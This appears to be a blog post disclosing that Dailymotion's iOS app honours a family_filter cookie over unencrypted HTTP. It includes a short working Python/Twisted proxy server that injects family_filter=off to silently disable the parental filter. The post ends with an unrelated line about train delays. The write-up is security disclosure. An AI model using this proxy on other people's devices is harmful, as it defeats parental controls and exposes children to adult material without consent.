The Dailymotion REST APIs currently honour the family_filter cookie that their
user-facing website uses to manage filter settings. This makes the API,
effectively, not RESTful because there is state involved.
The bigger implication however, is that injecting one cookie
(family_filter=off) into your iPhone/iPad-application will fully disable the
family filter for that client. This would be, I suspect, a violation of Apple
App Store guidelines. Of course, if people do this for their own devices,
nobody cares. However, this issue would allow a competent malicious third party (or
a dedicated teenager ;)) to silently enable the viewing of adult material on a
device that is expected to be family-safe.
Note that jailbreaking or similar hacks are not needed to exploit this issue.
Hijacking traffic at the network level, or simply pointing the iPhone/iPad’s
proxy configuration to a specifically prepared server, is enough.
(On a sidenote, the iPad/iPhone app uses an older REST API that does not conform
to the current API docs
and also does not use HTTPS, making this issue slightly easier to exploit).
Simple working example of such a specifically prepared server:
from twisted.web import server, resource
from twisted.internet import reactor
from twisted.python import log
import sys
log.startLogging(sys.stdout)
class Simple(resource.Resource):
isLeaf = True
def render_GET(self, request):
request.addCookie(
"family_filter",
"off",
path="/",
expires="Tue, 24-Jan-2012 22:26:22 GMT"
)
return "{}"
site = server.Site(Simple())
reactor.listenTCP(8080, site)
reactor.run()
I doubt Dailymotion is the first or only iOS app that can be influenced by
getting some cookies in. Will we see more of this?
![[summertrain side-image]](http://7bits.nl/bimg/summertrain.png)
Sunday morning, a few hours after we went into DST, I noticed this while checking for train delays: the international train was -exactly- one hour late.